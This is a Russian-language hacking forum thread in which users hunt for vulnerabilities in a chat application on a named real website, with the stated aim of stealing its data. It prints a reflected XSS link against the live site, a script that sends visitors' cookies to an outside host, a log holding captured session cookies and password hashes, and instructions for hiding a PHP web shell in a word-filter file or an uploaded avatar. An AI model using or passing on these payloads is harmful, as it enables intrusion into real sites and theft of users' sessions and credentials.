набрёл на один чат:
http://schekino.net/chat/login.php

решил вот поисследовать его.
в итоге оказалось что чат простой до безобразия. 95 кб в архиве.

посмотрел возможные уязвимости на securitylab. ничего нету :(

может тогда попробуем поискать уязвимости вместе?
я пока мельком пробежался по нему.
из папки incl утащил в чистом виде пару файлов:
mysqli_functions.inc, mysql_functions.inc, main.inc,smilies.inc, sqlite_functions.inc, skin.inc

Файл config.php в корневой лежит.
при открытии, что логично, пустая страница.

переменные все там хранятся.

теперь вот думаем как бы всё это дело утащить. может sql инъекции есть ? или ещё что.

мдя, за 3минуты нашол xss:

http://schekino.net/chat/info.php?why=%22%3E%3Cscript%3Ealert(document.cook ie)%3C/script%3E

хотя толку от нее нету...

я думаю никто не будет против по поводу того что я спущу найденое мной в паблик

http://localhost/chat/info.php?reason=<script%20src=http://localhost/s.js></script>

s.js
img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;


REFERER=http://localhost/chat/info.php?reason=%3C%73%63%72%69%70%74%20%73%72%63% 3D%68%74%74%70%3A%2F%2F%6C%6F%63%61%6C%68%6F%73%74 %2F%73%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E
QUERY=blab_id=1-bb2e48de1ba9a89497564acb9b584cc4; blab_pass=813dfe9bd7b89fbcc5fd29d2be091bac; blab_lang=9; blab_time=3
AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1)
+ с правами админа можно сдампить БД юзеров,
в badwords.txt можно безпалевно вписать
<?php system($_GET[cmd]); ?> - админ этого неувидит, а так же с можно загрузить картинку вместо авы, тоесть PHP шелл без всяких заголовков, правда с расширением gif... и при наличии на сайте локального инклуда я думаю понимаете что можно сделать ;)

InferNo23
согласен. может ещё что сможем интересное найти?

Может отсюда что можно накопать?
http://schekino.net/chat/empty.txt

сорцы чата на nulled-warez.org есть, если ты за сорцами гонишся...

сорцы чата на nulled-warez.org есть, если ты за сорцами гонишся...
сорцы у меня есть. они ж в открытом доступе есть на оф сайте.

мне интереснее как можно выудить инфу из config.php
важно не само его содержание, а способ узнать инфу

тем более, на чате нет системы регистрации. выбрал любой ник и вошёл. админ интерфейса тоже вроде как нет.

вот потому и думаю что в итоге то в чате конфиденциального есть

мне интереснее как можно выудить инфу из config.php
только если у тебя есть шелл или инклуд локальный..